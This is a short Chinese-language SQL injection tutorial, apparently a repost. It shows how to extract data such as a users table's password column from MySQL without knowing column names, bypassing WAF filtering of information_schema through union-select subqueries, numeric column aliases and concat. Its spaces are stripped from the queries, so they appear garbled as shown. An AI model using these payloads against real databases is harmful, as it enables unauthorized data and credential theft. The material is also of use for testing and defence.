0x00 简介
在 mysql => 5 的版本中存在库information_schema,记录着mysql中所有表的结构,通常,在mysql sqli中,我们会通过此库中的表去获取其他表的结构,即表名,列名等。但是这个库也会经常被WAF过滤。当我们通过暴力破解获取到表名后,该如何进行下一步利用呢?
在information_schema中,除了SCHEMATA,TABLES,COLUMNS有表信息外,高版本的mysql中,还有INNODB_TABLES及INNODB_COLUMNS中记录着表结构。
正常的查询如下:
其中,列名为id,name,pass,mail,phone,使用union查询
select1,2,3,4,5unionselect*fromusers;
接着,就可以继续使用数字来对应列,如3对应了表里面的pass:
select`3`from (select1,2,3,4,5unionselect*fromusers)a;
当 ` 不能使用的时候,使用别名来代替:
selectb from (select1,2,3asb,4,5unionselect*fromusers)a;
在注入中查询多个列:
selectconcat(`2`,0x3a,`3`) from (select1,2,3,4,5unionselect*fromusers)alimit1,1;
FROM:Extracting data without knowing columns names
更多精彩内容请关注公众号Kay0898,干货请加入知识星球ID:19483446